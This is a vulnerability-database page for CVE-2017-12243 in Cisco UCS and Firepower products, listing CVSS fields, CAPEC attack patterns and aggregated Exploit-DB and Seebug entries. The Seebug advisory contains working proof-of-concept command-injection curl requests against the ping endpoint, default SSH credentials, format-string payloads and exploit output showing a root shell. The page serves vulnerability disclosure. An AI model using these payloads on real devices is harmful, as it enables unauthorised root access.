Vulnerabilities > CVE-2017-12243 - OS Command Injection vulnerability in Cisco products
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
A vulnerability in the Cisco Unified Computing System (UCS) Manager, Cisco Firepower 4100 Series Next-Generation Firewall (NGFW), and Cisco Firepower 9300 Security Appliance could allow an authenticated, local attacker to obtain root shell privileges on the device, aka Command Injection. The vulnerability is due to improper validation of string input in the shell application. An attacker could exploit this vulnerability through the use of malicious commands. A successful exploit could allow the attacker to obtain root shell privileges on the device. Cisco Bug IDs: CSCvf20741, CSCvf60078.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 3 | |
| Hardware | 6 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
| description | Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution. CVE-2017-12243. Remote exploit for Linux platform |
| id | EDB-ID:44052 |
| last seen | 2018-02-15 |
| modified | 2017-11-01 |
| published | 2017-11-01 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/44052/ |
| title | Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution |
Seebug
| bulletinFamily | exploit |
| description | ## Vulnerabilities Summary The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator version 3.1(2ePE1). Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured and managed by Cisco UCS Manager. For example, you can use Cisco UCS Platform Emulator to create and test a supported Cisco UCS configuration, or to duplicate an existing Cisco UCS environment for troubleshooting or development purposes. The vulnerabilities found in Cisco UCS Platform Emulator are: - ** Unauthenticated remote code execution** - **Authenticated remote code execution** ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ##Vendor response The vendor has released patches to address this vulnerability and issue the following CVE: CVE-2017-12243 ##Vulnerabilities details **Unauthenticated remote code execution** User controlled input is not sufficiently sanitized when passed to IP/settings/ping function. An unauthenticated attacker can inject commands via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root on the remote machine. **Proof of Concept** ``` curl "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#" curl -k "https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#" curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1" curl -k "https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1" ``` By sending one of the above requests the Cisco UCS will response with: ``` /sample output/ ================ demo@kali:~/poc$ curl -k "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#" PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU/Linux demo@kali:~/poc$ curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1" uid=0(root) gid=0(root) groups=0(root) ``` ### Authenticated remote code execution Cisco UCS Platform Emulator is vulnerable to format string vulnerability that leads to remote code execution. Cisco UCS Platform Emulator runs an SSH server by default, and users who log-in via ssh runs the following command: `show sel %x` Get the following response: `"Error: Invalid rack server value: ...somedigits.."` By execute the ssh “show sel %x” command we overwriting got entry for _ZN7clidcos15CommandEmulator16cli_param_filterEPKc function from libsamvsh.so with libc system. ## Proof of Concept In order to exploit the vulnerability, please follow the following instructions: Install ucspe on vm (setup all 3 network cards) with the following user and password: ``` Default ucspe user : ucspe Default ucspe pass : ucspe ``` Run the ucspe and write down the ip address of the ucspe (visible in console “Connected to IP: ….”) In this Proof of Concept we will use IP – 192.168.1.43 Open up two terminals on some other machine (kali for example). On the first terminal: 1. Create poc directory, put poc4_ucspe_3.1.2e.py in the poc directory. change current directory to poc 2. Create fifo1: `mkfifo fifo1` 3. Create output directory: `kdir output` 4. Run ssh with stdin redirected from fifo1 and stdout redirected to output/log file: ``` tail -f fifo1 | ssh [email protected] > output/log # use default credentials ucspe/ucspe ``` On the second terminal (terminal2): ``` Change current directory to poc Run the poc4_ucspe_3.1.2e.py ``` The output should be: ### TERMINAL1 ``` demo@kali:~/poc$ mkfifo fifo1 demo@kali:~/poc$ mkdir output demo@kali:~/poc$ tail -f fifo1 | ssh [email protected] > output/log Pseudo-terminal will not be allocated because stdin is not a terminal. The authenticity of host '192.168.1.43 (192.168.1.43)' can't be established. RSA key fingerprint is SHA256:qEdgqNFyfqA2BU1+cH9rmYrsIOiQr/NlCpgAyzrX70Y. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.43' (RSA) to the list of known hosts. [email protected]'s password: TERM environment variable not set. ``` ### TERMINAL2 ```shell demo@kali:~/poc$ python poc4_ucspe_3.1.2e.py Going through some menus please wait a moment.. You should now see on the other terminal message simmilar to "Error: Already in local-mgmt shell.." [.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&) addres from libsamvsh.so -> 0x6b9f64 [.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt -> 0x6d7a70 [.] Dumping snprintf address from libc -> 0x7791210 [.] Calculating libc system address -> libc base addr = 0x7746000 -> system addr = 0x7780f60 [.] Sending payload.. show sel %62c%28$nAAA show sel %237c%28$nAA show sel %86c%28$nAAA show sel %229c%28$nAA Sleep for fork adjustment.. Ok please type your commands (type exit for exit) > id ['uid=0(root) gid=0(root) groups=0(root)'] > ``` |
| id | SSV:96791 |
| last seen | 2017-11-19 |
| modified | 2017-11-01 |
| published | 2017-11-01 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-96791 |
| title | Cisco UCS Platform Emulator Remote Code Execution |